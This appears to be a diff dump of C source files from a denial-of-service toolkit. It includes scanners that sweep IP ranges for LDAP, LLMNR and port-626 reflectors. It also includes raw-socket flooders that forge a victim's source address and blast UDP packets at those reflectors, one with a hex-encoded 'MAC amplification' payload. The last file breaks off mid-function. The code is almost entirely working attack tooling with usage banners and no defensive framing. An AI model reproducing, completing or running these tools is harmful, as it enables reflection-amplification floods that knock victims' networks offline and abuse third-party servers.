struct sockaddr_in saddr;
|
||||
struct in_addr in;
|
||||
|
||||
unsigned char *buffer = (unsigned char *)malloc(65536);
|
||||
sock_raw = socket(AF_INET , SOCK_RAW , IPPROTO_UDP);
|
||||
if(sock_raw < 0)
|
||||
{
|
||||
printf("[+] LDAP_IMPROVED [+] Somenthing are wrong, try again. [+] LDAP_IMPROVED [+]\n");
|
||||
exit(1);
|
||||
}
|
||||
while(1)
|
||||
{
|
||||
saddr_size = sizeof saddr;
|
||||
data_size = recvfrom(sock_raw , buffer , 65536 , 0 , (struct sockaddr *)&saddr , &saddr_size);
|
||||
if(data_size <0 )
|
||||
{
|
||||
printf("[+] LDAP_IMPROVED [+] Somenthing are wrong, try again. [+] LDAP_IMPROVED [+]\n");
|
||||
exit(1);
|
||||
}
|
||||
struct iphdr *iph = (struct iphdr*)buffer;
|
||||
if(iph->protocol == 17)
|
||||
{
|
||||
unsigned short iphdrlen = iph->ihl*4;
|
||||
struct udphdr *udph = (struct udphdr*)(buffer + iphdrlen);
|
||||
unsigned char* payload = buffer + iphdrlen + 67;
|
||||
if(ntohs(udph->source) == 389)
|
||||
{
|
||||
int body_length = data_size - iphdrlen - 67;
|
||||
|
||||
if (body_length > 40)
|
||||
|
||||
{
|
||||
found_srvs++;
|
||||
printf("[+] LDAP_IMPROVED [+] Found New Server %s.\n", inet_ntoa(saddr.sin_addr));
|
||||
fprintf(fd,"%s\n",inet_ntoa(saddr.sin_addr));
|
||||
fflush(fd);
|
||||
|
||||
}
|
||||
|
||||
}
|
||||
}
|
||||
|
||||
}
|
||||
close(sock_raw);
|
||||
|
||||
}
|
||||
|
||||
int main(int argc, char *argv[ ])
|
||||
{
|
||||
|
||||
if(argc < 6){
|
||||
printf("[+] LDAP_IMPROVED by Alemalakra [+]\n");
|
||||
fprintf(stdout, "[+] Use: %s <class to start (192.168.0.1)> <class to end (198.255.255.255)> <file to save list> <threads (30)> <scan delay in ms (20)>\n", argv[0]);
|
||||
exit(-1);
|
||||
}
|
||||
fd = fopen(argv[3], "a");
|
||||
sleep_between = atoi(argv[5]);
|
||||
|
||||
signal(SIGINT, &sighandler);
|
||||
|
||||
int threads = atoi(argv[4]);
|
||||
pthread_t thread;
|
||||
|
||||
pthread_t listenthread;
|
||||
pthread_create( &listenthread, NULL, &recievethread, NULL);
|
||||
|
||||
char *str_start = malloc(18);
|
||||
memset(str_start, 0, 18);
|
||||
str_start = argv[1];
|
||||
char *str_end = malloc(18);
|
||||
memset(str_end, 0, 18);
|
||||
str_end = argv[2];
|
||||
start = inet_addr(str_start);
|
||||
per_thread = (ntohl(inet_addr(str_end)) - ntohl(inet_addr(str_start))) / threads;
|
||||
unsigned long toscan = (ntohl(inet_addr(str_end)) - ntohl(inet_addr(str_start)));
|
||||
int i;
|
||||
for(i = 0;i<threads;i++){
|
||||
pthread_create( &thread, NULL, &flood, (void *) i);
|
||||
}
|
||||
sleep(1);
|
||||
printf("[+] LDAP_IMPROVED [+] Scanning STARTED! Wait a few minutes..\n\n\n\n\n\n");
|
||||
|
||||
char *new;
|
||||
new = (char *)malloc(16*6);
|
||||
while (running_threads > 0)
|
||||
{
|
||||
fflush(stdout);
|
||||
bytes_sent=0;
|
||||
scanned = 0;
|
||||
sleep(1);
|
||||
}
|
||||
printf("\n");
|
||||
fclose(fd);
|
||||
return 0;
|
||||
}
|
|
@ -0,0 +1,187 @@
|
|||
#include <time.h>
|
||||
#include <pthread.h>
|
||||
#include <unistd.h>
|
||||
#include <stdio.h>
|
||||
#include <stdlib.h>
|
||||
#include <string.h>
|
||||
#include <sys/socket.h>
|
||||
#include <netinet/ip.h>
|
||||
#include <netinet/udp.h>
|
||||
#include <arpa/inet.h>
|
||||
#define MAX_PACKET_SIZE 8192
|
||||
#define PHI 0x9e3779b9
|
||||
static uint32_t Q[4096], c = 362436;
|
||||
struct list
|
||||
{
|
||||
struct sockaddr_in data;
|
||||
struct list *next;
|
||||
struct list *prev;
|
||||
};
|
||||
struct list *head;
|
||||
struct thread_data{ int thread_id; struct list *list_node; struct sockaddr_in sin; };
|
||||
void init_rand(uint32_t x)
|
||||
{
|
||||
int i;
|
||||
Q[0] = x;
|
||||
Q[1] = x + PHI;
|
||||
Q[2] = x + PHI + PHI;
|
||||
for (i = 3; i < 4096; i++)
|
||||
{
|
||||
Q[i] = Q[i - 3] ^ Q[i - 2] ^ PHI ^ i;
|
||||
}
|
||||
}
|
||||
|
||||
uint32_t rand_cmwc(void)
|
||||
{
|
||||
uint64_t t, a = 18782LL;
|
||||
static uint32_t i = 4095;
|
||||
uint32_t x, r = 0xfffffffe;
|
||||
i = (i + 1) & 4095;
|
||||
t = a * Q[i] + c;
|
||||
c = (t >> 32);
|
||||
x = t + c;
|
||||
if (x < c) {
|
||||
x++;
|
||||
c++;
|
||||
}
|
||||
return (Q[i] = r - x);
|
||||
}
|
||||
|
||||
/* function for header checksums */
|
||||
unsigned short csum (unsigned short *buf, int nwords)
|
||||
{
|
||||
unsigned long sum;
|
||||
for (sum = 0; nwords > 0; nwords--)
|
||||
sum += *buf++;
|
||||
sum = (sum >> 16) + (sum & 0xffff);
|
||||
sum += (sum >> 16);
|
||||
return (unsigned short)(~sum);
|
||||
}
|
||||
|
||||
void setup_ip_header(struct iphdr *iph)
|
||||
{
|
||||
iph->ihl = 5;
|
||||
iph->version = 4;
|
||||
iph->tos = 0;
|
||||
iph->tot_len = sizeof(struct iphdr) + sizeof(struct udphdr) + 1;
|
||||
iph->id = htonl(54321);
|
||||
iph->frag_off = 0;
|
||||
iph->ttl = MAXTTL;
|
||||
iph->protocol = IPPROTO_UDP;
|
||||
iph->check = 0;
|
||||
iph->saddr = inet_addr("192.168.3.100");
|
||||
}
|
||||
|
||||
void setup_udp_header(struct udphdr *udph)
|
||||
{
|
||||
udph->source = htons(5678);
|
||||
udph->dest = htons(5355);
|
||||
udph->check = 0;
|
||||
memcpy((void *)udph + sizeof(struct udphdr), "\x00", 1);
|
||||
udph->len=htons(sizeof(struct udphdr) + 1);
|
||||
}
|
||||
|
||||
void *flood(void *par1)
|
||||
{
|
||||
struct thread_data *td = (struct thread_data *)par1;
|
||||
char datagram[MAX_PACKET_SIZE];
|
||||
struct iphdr *iph = (struct iphdr *)datagram;
|
||||
struct udphdr *udph = (/*u_int8_t*/void *)iph + sizeof(struct iphdr);
|
||||
struct sockaddr_in sin = td->sin;
|
||||
struct list *list_node = td->list_node;
|
||||
int s = socket(PF_INET, SOCK_RAW, IPPROTO_TCP);
|
||||
if(s < 0){
|
||||
fprintf(stderr, "Could not open raw socket.\n");
|
||||
exit(-1);
|
||||
}
|
||||
init_rand(time(NULL));
|
||||
memset(datagram, 0, MAX_PACKET_SIZE);
|
||||
setup_ip_header(iph);
|
||||
setup_udp_header(udph);
|
||||
udph->source = sin.sin_port;
|
||||
iph->saddr = sin.sin_addr.s_addr;
|
||||
iph->daddr = list_node->data.sin_addr.s_addr;
|
||||
iph->check = csum ((unsigned short *) datagram, iph->tot_len >> 1);
|
||||
int tmp = 1;
|
||||
const int *val = &tmp;
|
||||
if(setsockopt(s, IPPROTO_IP, IP_HDRINCL, val, sizeof (tmp)) < 0){
|
||||
fprintf(stderr, "Error: setsockopt() - Cannot set HDRINCL!\n");
|
||||
exit(-1);
|
||||
}
|
||||
int i=0;
|
||||
while(1){
|
||||
sendto(s, datagram, iph->tot_len, 0, (struct sockaddr *) &list_node->data, sizeof(list_node->data));
|
||||
list_node = list_node->next;
|
||||
iph->daddr = list_node->data.sin_addr.s_addr;
|
||||
iph->check = csum ((unsigned short *) datagram, iph->tot_len >> 1);
|
||||
if(i==5)
|
||||
{
|
||||
usleep(0);
|
||||
i=0;
|
||||
}
|
||||
i++;
|
||||
}
|
||||
}
|
||||
int main(int argc, char *argv[ ])
|
||||
{
|
||||
if(argc < 4){
|
||||
fprintf(stderr, "Invalid parameters!\n");
|
||||
fprintf(stdout, "Usage: %s <target IP> <target port> <reflection file> <throttle> <time (optional)>\n", argv[0]);
|
||||
exit(-1);
|
||||
}
|
||||
int i = 0;
|
||||
head = NULL;
|
||||
fprintf(stdout, "Setting up Sockets...\n");
|
||||
int max_len = 128;
|
||||
char *buffer = (char *) malloc(max_len);
|
||||
buffer = memset(buffer, 0x00, max_len);
|
||||
int num_threads = atoi(argv[4]);
|
||||
FILE *list_fd = fopen(argv[3], "r");
|
||||
while (fgets(buffer, max_len, list_fd) != NULL) {
|
||||
if ((buffer[strlen(buffer) - 1] == '\n') ||
|
||||
(buffer[strlen(buffer) - 1] == '\r')) {
|
||||
buffer[strlen(buffer) - 1] = 0x00;
|
||||
if(head == NULL)
|
||||
{
|
||||
head = (struct list *)malloc(sizeof(struct list));
|
||||
bzero(&head->data, sizeof(head->data));
|
||||
head->data.sin_addr.s_addr=inet_addr(buffer);
|
||||
head->next = head;
|
||||
head->prev = head;
|
||||
} else {
|
||||
struct list *new_node = (struct list *)malloc(sizeof(struct list));
|
||||
memset(new_node, 0x00, sizeof(struct list));
|
||||
new_node->data.sin_addr.s_addr=inet_addr(buffer);
|
||||
new_node->prev = head;
|
||||
new_node->next = head->next;
|
||||
head->next = new_node;
|
||||
}
|
||||
i++;
|
||||
} else {
|
||||
continue;
|
||||
}
|
||||
}
|
||||
struct list *current = head->next;
|
||||
pthread_t thread[num_threads];
|
||||
struct sockaddr_in sin;
|
||||
sin.sin_family = AF_INET;
|
||||
sin.sin_port = htons(atoi(argv[2]));
|
||||
sin.sin_addr.s_addr = inet_addr(argv[1]);
|
||||
struct thread_data td[num_threads];
|
||||
for(i = 0;i<num_threads;i++){
|
||||
td[i].thread_id = i;
|
||||
td[i].sin= sin;
|
||||
td[i].list_node = current;
|
||||
pthread_create( &thread[i], NULL, &flood, (void *) &td[i]);
|
||||
}
|
||||
fprintf(stdout, "Starting Flood...\n");
|
||||
if(argc > 5)
|
||||
{
|
||||
sleep(atoi(argv[5]));
|
||||
} else {
|
||||
while(1){
|
||||
sleep(1);
|
||||
}
|
||||
}
|
||||
return 0;
|
||||
}
|
|
@ -0,0 +1,306 @@
|
|||
#include <pcap.h>
|
||||
#include <stdio.h>
|
||||
#include <stdlib.h> // for exit()
|
||||
#include <string.h> //for memset
|
||||
#include <sys/ioctl.h>
|
||||
#include <net/if.h>
|
||||
#include <sys/socket.h>
|
||||
#include <arpa/inet.h> // for inet_ntoa()
|
||||
#include <net/ethernet.h>
|
||||
#include <netinet/udp.h> //Provides declarations for udp header
|
||||
#include <netinet/ip.h> //Provides declarations for ip header
|
||||
#include <pthread.h>
|
||||
#include <semaphore.h>
|
||||
#include <signal.h>
|
||||
#include <sys/resource.h>
|
||||
#include <unistd.h>
|
||||
static unsigned int payloadsize = 1;
|
||||
static unsigned int xport = 5355;
|
||||
void process_packet(void *args, struct pcap_pkthdr *header, void *buffer);
|
||||
|
||||
struct buffer
|
||||
{
|
||||
void *data;
|
||||
int size;
|
||||
struct buffer *next;
|
||||
struct buffer *prev;
|
||||
};
|
||||
struct buffer *head;
|
||||
|
||||
char *ipv4;
|
||||
int processed,over,total,i,j;
|
||||
struct sockaddr_in dest;
|
||||
pthread_mutex_t buf_mutex = PTHREAD_MUTEX_INITIALIZER;
|
||||
sem_t loop_sem;
|
||||
int running_threads = 0;
|
||||
volatile int found_srvs = 0;
|
||||
volatile unsigned long per_thread = 0;
|
||||
volatile unsigned long start = 0;
|
||||
volatile unsigned long scanned = 0;
|
||||
int sleep_between = 0;
|
||||
volatile int bytes_sent = 0;
|
||||
volatile unsigned long hosts_done = 0;
|
||||
FILE *fd;
|
||||
|
||||
void *readthread()
|
||||
{
|
||||
struct buffer *ourhead = head;
|
||||
struct sockaddr_in saddr;
|
||||
while(1)
|
||||
{
|
||||
sem_wait(&loop_sem);
|
||||
while(ourhead->data == NULL){ ourhead = ourhead->next; }
|
||||
pthread_mutex_lock(&buf_mutex);
|
||||
void *buf = malloc(ourhead->size);
|
||||
int size = ourhead->size;
|
||||
memcpy(buf, ourhead->data, ourhead->size);
|
||||
free(ourhead->data);
|
||||
ourhead->data = NULL;
|
||||
ourhead->size = 0;
|
||||
pthread_mutex_unlock(&buf_mutex);
|
||||
memset(&saddr, 0, sizeof(saddr));
|
||||
struct iphdr *iph = (struct iphdr*)(buf + sizeof(struct ethhdr));
|
||||
saddr.sin_addr.s_addr = iph->saddr;
|
||||
struct udphdr *udph = (struct udphdr *)(buf + sizeof(struct ethhdr) + sizeof(struct iphdr));
|
||||
if(ntohs(udph->source) == xport)
|
||||
{
|
||||
int body_length = size - sizeof(struct ethhdr) - sizeof(struct iphdr) - sizeof(struct udphdr);
|
||||
fprintf(fd,"%s %d\n",inet_ntoa(saddr.sin_addr),body_length);
|
||||
fflush(fd);
|
||||
found_srvs++;
|
||||
}
|
||||
free(buf);
|
||||
processed++;
|
||||
ourhead = ourhead->next;
|
||||
}
|
||||
}
|
||||
|
||||
void *flood(void *par1)
|
||||
{
|
||||
running_threads++;
|
||||
int thread_id = (int)par1;
|
||||
unsigned long start_ip = htonl(ntohl(start)+(per_thread*thread_id));
|
||||
unsigned long end = htonl(ntohl(start)+(per_thread*(thread_id+1)));
|
||||
unsigned long w;
|
||||
int y;
|
||||
unsigned char buf[65536];
|
||||
memcpy(buf, " ", payloadsize);
|
||||
int sizeofpayload = payloadsize;
|
||||
int sock;
|
||||
if((sock=socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP))<0) {
|
||||
perror("cant open socket");
|
||||
exit(-1);
|
||||
}
|
||||
for(w=ntohl(start_ip);w<htonl(end);w++)
|
||||
{
|
||||
struct sockaddr_in servaddr;
|
||||
bzero(&servaddr, sizeof(servaddr));
|
||||
servaddr.sin_family = AF_INET;
|
||||
servaddr.sin_addr.s_addr=htonl(w);
|
||||
servaddr.sin_port=htons(xport);
|
||||
sendto(sock,(char *)buf,sizeofpayload,0, (struct sockaddr *)&servaddr,sizeof(servaddr));
|
||||
bytes_sent+=sizeofpayload;
|
||||
scanned++;
|
||||
hosts_done++;
|
||||
usleep(sleep_between*1000);
|
||||
}
|
||||
close(sock);
|
||||
running_threads--;
|
||||
return;
|
||||
}
|
||||
|
||||
void sighandler(int sig)
|
||||
{
|
||||
fclose(fd);
|
||||
printf("\n");
|
||||
exit(0);
|
||||
}
|
||||
|
||||
void *printthread(void *argvs)
|
||||
{
|
||||
char **argv = (char **)argvs;
|
||||
int threads = atoi(argv[4]);
|
||||
pthread_t thread;
|
||||
sleep(1);
|
||||
char *str_start = malloc(18);
|
||||
memset(str_start, 0, 18);
|
||||
str_start = argv[1];
|
||||
char *str_end = malloc(18);
|
||||
memset(str_end, 0, 18);
|
||||
str_end = argv[2];
|
||||
start = inet_addr(str_start);
|
||||
per_thread = (ntohl(inet_addr(str_end)) - ntohl(inet_addr(str_start))) / threads;
|
||||
unsigned long toscan = (ntohl(inet_addr(str_end)) - ntohl(inet_addr(str_start)));
|
||||
int i;
|
||||
for(i = 0;i<threads;i++){
|
||||
pthread_create( &thread, NULL, &flood, (void *) i);
|
||||
}
|
||||
sleep(1);
|
||||
char *temp = (char *)malloc(17);
|
||||
memset(temp, 0, 17);
|
||||
sprintf(temp, "Found");
|
||||
printf("%-16s", temp);
|
||||
memset(temp, 0, 17);
|
||||
sprintf(temp, "Host/s");
|
||||
printf("%-16s", temp);
|
||||
memset(temp, 0, 17);
|
||||
sprintf(temp, "B/s");
|
||||
printf("%-16s", temp);
|
||||
memset(temp, 0, 17);
|
||||
sprintf(temp, "Running Thrds");
|
||||
printf("%-16s", temp);
|
||||
memset(temp, 0, 17);
|
||||
sprintf(temp, "Done");
|
||||
printf("%s", temp);
|
||||
printf("\n");
|
||||
|
||||
char *new;
|
||||
new = (char *)malloc(16*6);
|
||||
while (running_threads > 0)
|
||||
{
|
||||
printf("\r");
|
||||
memset(new, '\0', 16*6);
|
||||
sprintf(new, "%s|%-15lu", new, found_srvs);
|
||||
sprintf(new, "%s|%-15d", new, scanned);
|
||||
sprintf(new, "%s|%-15d", new, bytes_sent);
|
||||
sprintf(new, "%s|%-15d", new, running_threads);
|
||||
memset(temp, 0, 17);
|
||||
int percent_done=((double)(hosts_done)/(double)(toscan))*100;
|
||||
sprintf(temp, "%d%%", percent_done);
|
||||
sprintf(new, "%s|%s", new, temp);
|
||||
printf("%s", new);
|
||||
fflush(stdout);
|
||||
bytes_sent=0;
|
||||
scanned = 0;
|
||||
sleep(1);
|
||||
}
|
||||
printf("\n");
|
||||
fclose(fd);
|
||||
exit(0);
|
||||
}
|
||||
|
||||
int main(int argc, char *argv[ ])
|
||||
{
|
||||
if(argc < 6){
|
||||
fprintf(stderr, "Invalid parameters!\n");
|
||||
fprintf(stdout, "Usage: %s <ip range start (192.168.0.0)> <ip range end (192.168.255.255)> <outfile> <threads> <scan delay in ms>\n", argv[0]);
|
||||
exit(-1);
|
||||
}
|
||||
fd = fopen(argv[3], "a");
|
||||
sleep_between = atoi(argv[5]);
|
||||
int num_threads = atoi(argv[4]);
|
||||
|
||||
const rlim_t kOpenFD = 1024 + (num_threads * 2);
|
||||
struct rlimit rl;
|
||||
int result;
|
||||
rl.rlim_cur = kOpenFD;
|
||||
rl.rlim_max = kOpenFD;
|
||||
result = setrlimit(RLIMIT_NOFILE, &rl);
|
||||
if (result != 0)
|
||||
{
|
||||
perror("setrlimit_nofile");
|
||||
fprintf(stderr, "setrlimit_nofile returned result = %d\n", result);
|
||||
}
|
||||
bzero(&rl, sizeof(struct rlimit));
|
||||
rl.rlim_cur = 256 * 1024;
|
||||
rl.rlim_max = 4096 * 1024;
|
||||
result = setrlimit(RLIMIT_STACK, &rl);
|
||||
if (result != 0)
|
||||
{
|
||||
perror("setrlimit_stack");
|
||||
fprintf(stderr, "setrlimit_stack returned result = %d\n", result);
|
||||
}
|
||||
|
||||
signal(SIGINT, &sighandler);
|
||||
|
||||
pcap_if_t *alldevsp;
|
||||
pcap_t *handle; //Handle of the device that shall be sniffed
|
||||
|
||||
char errbuf[100] , *devname , devs[100][100];
|
||||
int count = 1 , n;
|
||||
|
||||
if( pcap_findalldevs( &alldevsp , errbuf) )
|
||||
{
|
||||
exit(1);
|
||||
}
|
||||
|
||||
devname = alldevsp->name;
|
||||
ipv4 = malloc(16);
|
||||
bzero(ipv4, 16);
|
||||
struct ifreq ifc;
|
||||
int res;
|
||||
int sockfd = socket(AF_INET, SOCK_DGRAM, 0);
|
||||
|
||||
if(sockfd < 0) exit(-1);
|
||||
strcpy(ifc.ifr_name, devname);
|
||||
res = ioctl(sockfd, SIOCGIFADDR, &ifc);
|
||||
close(sockfd);
|
||||
if(res < 0) exit(-1);
|
||||
strcpy(ipv4, inet_ntoa(((struct sockaddr_in*)&ifc.ifr_addr)->sin_addr));
|
||||
printf("Opening device %s for sniffing ... " , devname);
|
||||
handle = pcap_open_live(devname , 65536 , 1 , 0 , errbuf);
|
||||
|
||||
if (handle == NULL)
|
||||
{
|
||||
fprintf(stderr, "Couldn't open device %s : %s\n" , devname , errbuf);
|
||||
exit(1);
|
||||
}
|
||||
printf("Done\n");
|
||||
|
||||
sem_init(&loop_sem, 0, -1);
|
||||
i = 1024*1000;
|
||||
while(i--)
|
||||
{
|
||||
if(head == NULL)
|
||||
{
|
||||
head = (struct buffer *)malloc(sizeof(struct buffer));
|
||||
bzero(head, sizeof(struct buffer));
|
||||
head->data = NULL;
|
||||
head->size = 0;
|
||||
head->next = head;
|
||||
head->prev = head;
|
||||
} else {
|
||||
struct buffer *new_node = (struct buffer *)malloc(sizeof(struct buffer));
|
||||
bzero(new_node, sizeof(struct buffer));
|
||||
new_node->data = NULL;
|
||||
new_node->size = 0;
|
||||
new_node->prev = head;
|
||||
new_node->next = head->next;
|
||||
head->next = new_node;
|
||||
}
|
||||
}
|
||||
|
||||
pthread_t prnthread;
|
||||
pthread_create( &prnthread, NULL, &printthread, (void *)argv);
|
||||
pthread_t redthread;
|
||||
pthread_create( &redthread, NULL, &readthread, NULL);
|
||||
|
||||
pcap_loop(handle , -1 , process_packet , NULL);
|
||||
|
||||
return 0;
|
||||
}
|
||||
|
||||
void process_packet(void *args, struct pcap_pkthdr *header, void *buffer)
|
||||
{
|
||||
int size = header->len;
|
||||
|
||||
//Get the IP Header part of this packet , excluding the ethernet header
|
||||
struct iphdr *iph = (struct iphdr*)(buffer + sizeof(struct ethhdr));
|
||||
memset(&dest, 0, sizeof(dest));
|
||||
dest.sin_addr.s_addr = iph->daddr;
|
||||
|
||||
if(iph->protocol == 17 && strcmp(inet_ntoa(dest.sin_addr), ipv4) == 0)
|
||||
{
|
||||
//toss into buffer
|
||||
if(head->data != NULL) over++;
|
||||
pthread_mutex_lock(&buf_mutex);
|
||||
void *temp = malloc(size);
|
||||
memcpy(temp, buffer, size);
|
||||
head->data = temp;
|
||||
head->size = size;
|
||||
head = head->next;
|
||||
pthread_mutex_unlock(&buf_mutex);
|
||||
sem_post(&loop_sem);
|
||||
total++;
|
||||
}
|
||||
}
|
|
@ -0,0 +1,191 @@
|
|||
/* MAC Amplification */
|
||||
|
||||
/* Made by shroom, credit me cus im swag for payload and idk for original ssdp script. */
|
||||
|
||||
#include <time.h>
|
||||
#include <pthread.h>
|
||||
#include <unistd.h>
|
||||
#include <stdio.h>
|
||||
#include <stdlib.h>
|
||||
#include <string.h>
|
||||
#include <sys/socket.h>
|
||||
#include <netinet/ip.h>
|
||||
#include <netinet/udp.h>
|
||||
#include <arpa/inet.h>
|
||||
#define MAX_PACKET_SIZE 8192
|
||||
#define PHI 0x9e3779b9
|
||||
static uint32_t Q[4096], c = 362436;
|
||||
struct list
|
||||
{
|
||||
struct sockaddr_in data;
|
||||
struct list *next;
|
||||
struct list *prev;
|
||||
};
|
||||
struct list *head;
|
||||
struct thread_data{ int thread_id; struct list *list_node; struct sockaddr_in sin; };
|
||||
void init_rand(uint32_t x)
|
||||
{
|
||||
int i;
|
||||
Q[0] = x;
|
||||
Q[1] = x + PHI;
|
||||
Q[2] = x + PHI + PHI;
|
||||
for (i = 3; i < 4096; i++)
|
||||
{
|
||||
Q[i] = Q[i - 3] ^ Q[i - 2] ^ PHI ^ i;
|
||||
}
|
||||
}
|
||||
|
||||
uint32_t rand_cmwc(void)
|
||||
{
|
||||
uint64_t t, a = 18782LL;
|
||||
static uint32_t i = 4095;
|
||||
uint32_t x, r = 0xfffffffe;
|
||||
i = (i + 1) & 4095;
|
||||
t = a * Q[i] + c;
|
||||
c = (t >> 32);
|
||||
x = t + c;
|
||||
if (x < c) {
|
||||
x++;
|
||||
c++;
|
||||
}
|
||||
return (Q[i] = r - x);
|
||||
}
|
||||
|
||||
/* function for header checksums */
|
||||
unsigned short csum (unsigned short *buf, int nwords)
|
||||
{
|
||||
unsigned long sum;
|
||||
for (sum = 0; nwords > 0; nwords--)
|
||||
sum += *buf++;
|
||||
sum = (sum >> 16) + (sum & 0xffff);
|
||||
sum += (sum >> 16);
|
||||
return (unsigned short)(~sum);
|
||||
}
|
||||
|
||||
void setup_ip_header(struct iphdr *iph)
|
||||
{
|
||||
iph->ihl = 5;
|
||||
iph->version = 4;
|
||||
iph->tos = 0;
|
||||
iph->tot_len = sizeof(struct iphdr) + sizeof(struct udphdr) + 30;
|
||||
iph->id = htonl(54321);
|
||||
iph->frag_off = 0;
|
||||
iph->ttl = MAXTTL;
|
||||
iph->protocol = IPPROTO_UDP;
|
||||
iph->check = 0;
|
||||
iph->saddr = inet_addr("192.168.3.100");
|
||||
}
|
||||
|
||||
void setup_udp_header(struct udphdr *udph)
|
||||
{
|
||||
udph->source = htons(5678);
|
||||
udph->dest = htons(626);
|
||||
udph->check = 0;
|
||||
memcpy((void *)udph + sizeof(struct udphdr), "\x53\x4e\x51\x55\x45\x52\x59\x3a\x20\x31\x32\x37\x2e\x30\x2e\x30\x2e\x31\x3a\x41\x41\x41\x41\x41\x41\x3a\x78\x73\x76\x72", 30);
|
||||
udph->len=htons(sizeof(struct udphdr) + 30);
|
||||
}
|
||||
|
||||
void *flood(void *par1)
|
||||
{
|
||||
struct thread_data *td = (struct thread_data *)par1;
|
||||
char datagram[MAX_PACKET_SIZE];
|
||||
struct iphdr *iph = (struct iphdr *)datagram;
|
||||
struct udphdr *udph = (/*u_int8_t*/void *)iph + sizeof(struct iphdr);
|
||||
struct sockaddr_in sin = td->sin;
|
||||
struct list *list_node = td->list_node;
|
||||
int s = socket(PF_INET, SOCK_RAW, IPPROTO_TCP);
|
||||
if(s < 0){
|
||||
fprintf(stderr, "Could not open raw socket.\n");
|
||||
exit(-1);
|
||||
}
|
||||
init_rand(time(NULL));
|
||||
memset(datagram, 0, MAX_PACKET_SIZE);
|
||||
setup_ip_header(iph);
|
||||
setup_udp_header(udph);
|
||||
udph->source = sin.sin_port;
|
||||
iph->saddr = sin.sin_addr.s_addr;
|
||||
iph->daddr = list_node->data.sin_addr.s_addr;
|
||||
iph->check = csum ((unsigned short *) datagram, iph->tot_len >> 1);
|
||||
int tmp = 1;
|
||||
const int *val = &tmp;
|
||||
if(setsockopt(s, IPPROTO_IP, IP_HDRINCL, val, sizeof (tmp)) < 0){
|
||||
fprintf(stderr, "Error: setsockopt() - Cannot set HDRINCL!\n");
|
||||
exit(-1);
|
||||
}
|
||||
int i=0;
|
||||
while(1){
|
||||
sendto(s, datagram, iph->tot_len, 0, (struct sockaddr *) &list_node->data, sizeof(list_node->data));
|
||||
list_node = list_node->next;
|
||||
iph->daddr = list_node->data.sin_addr.s_addr;
|
||||
iph->check = csum ((unsigned short *) datagram, iph->tot_len >> 1);
|
||||
if(i==5)
|
||||
{
|
||||
usleep(0);
|
||||
i=0;
|
||||
}
|
||||
i++;
|
||||
}
|
||||
}
|
||||
int main(int argc, char *argv[ ])
|
||||
{
|
||||
if(argc < 4){
|
||||
fprintf(stderr, "Invalid parameters!\n");
|
||||
fprintf(stdout, "Usage: %s <target IP> <target port> <reflection file> <throttle> <time (optional)>\n", argv[0]);
|
||||
exit(-1);
|
||||
}
|
||||
int i = 0;
|
||||
head = NULL;
|
||||
fprintf(stdout, "Setting up Sockets...\n");
|
||||
int max_len = 128;
|
||||
char *buffer = (char *) malloc(max_len);
|
||||
buffer = memset(buffer, 0x00, max_len);
|
||||
int num_threads = atoi(argv[4]);
|
||||
FILE *list_fd = fopen(argv[3], "r");
|
||||
while (fgets(buffer, max_len, list_fd) != NULL) {
|
||||
if ((buffer[strlen(buffer) - 1] == '\n') ||
|
||||
(buffer[strlen(buffer) - 1] == '\r')) {
|
||||
buffer[strlen(buffer) - 1] = 0x00;
|
||||
if(head == NULL)
|
||||
{
|
||||
head = (struct list *)malloc(sizeof(struct list));
|
||||
bzero(&head->data, sizeof(head->data));
|
||||
head->data.sin_addr.s_addr=inet_addr(buffer);
|
||||
head->next = head;
|
||||
head->prev = head;
|
||||
} else {
|
||||
struct list *new_node = (struct list *)malloc(sizeof(struct list));
|
||||
memset(new_node, 0x00, sizeof(struct list));
|
||||
new_node->data.sin_addr.s_addr=inet_addr(buffer);
|
||||
new_node->prev = head;
|
||||
new_node->next = head->next;
|
||||
head->next = new_node;
|
||||
}
|
||||
i++;
|
||||
} else {
|
||||
continue;
|
||||
}
|
||||
}
|
||||
struct list *current = head->next;
|
||||
pthread_t thread[num_threads];
|
||||
struct sockaddr_in sin;
|
||||
sin.sin_family = AF_INET;
|
||||
sin.sin_port = htons(atoi(argv[2]));
|
||||
sin.sin_addr.s_addr = inet_addr(argv[1]);
|
||||
struct thread_data td[num_threads];
|
||||
for(i = 0;i<num_threads;i++){
|
||||
td[i].thread_id = i;
|
||||
td[i].sin= sin;
|
||||
td[i].list_node = current;
|
||||
pthread_create( &thread[i], NULL, &flood, (void *) &td[i]);
|
||||
}
|
||||
fprintf(stdout, "Starting Flood...\n");
|
||||
if(argc > 5)
|
||||
{
|
||||
sleep(atoi(argv[5]));
|
||||
} else {
|
||||
while(1){
|
||||
sleep(1);
|
||||
}
|
||||
}
|
||||
return 0;
|
||||
}
|
|
@ -0,0 +1,200 @@
|
|||
#include <pthread.h>
|
||||
#include <unistd.h>
|
||||
#include <stdio.h>
|
||||
#include <stdlib.h>
|
||||
#include <string.h>
|
||||
#include <sys/socket.h>
|
||||
#include <netinet/in.h>
|
||||
#include <signal.h>
|
||||
#include <sys/time.h>
|
||||
#include <sys/types.h>
|
||||
#include <math.h>
|
||||
#include <ctype.h>
|
||||
#include <errno.h>
|
||||
#include <arpa/inet.h>
|
||||
#include <netinet/ip.h>
|
||||
#include <netinet/udp.h>
|
||||
static unsigned int payloadsize = 30;
|
||||
static unsigned int xport = 626;
|
||||
|
||||
volatile int running_threads = 0;
|
||||
volatile int found_srvs = 0;
|
||||
volatile unsigned long per_thread = 0;
|
||||
volatile unsigned long start = 0;
|
||||
volatile unsigned long scanned = 0;
|
||||
volatile int sleep_between = 0;
|
||||
volatile int bytes_sent = 0;
|
||||
volatile unsigned long hosts_done = 0;
|
||||
FILE *fd;
|
||||
char payload[] =
|
||||
"\x53\x4e\x51\x55\x45\x52\x59\x3a\x20\x31\x32\x37\x2e\x30\x2e\x30\x2e\x31\x3a\x41\x41\x41\x41\x41\x41\x3a\x78\x73\x76\x72";
|
||||
|
||||
size = sizeof(payload);
|
||||
|
||||
void *flood(void *par1)
|
||||
{
|
||||
running_threads++;
|
||||
int thread_id = (int)par1;
|
||||
unsigned long start_ip = htonl(ntohl(start)+(per_thread*thread_id));
|
||||
unsigned long end = htonl(ntohl(start)+(per_thread*(thread_id+1)));
|
||||
unsigned long w;
|
||||
int y;
|
||||
unsigned char buf[65536];
|
||||
memset(buf, 0x01, payloadsize);
|
||||
int sizeofpayload = payloadsize;
|
||||
int sock;
|
||||
if((sock=socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP))<0) {
|
||||
perror("cant open socket");
|
||||
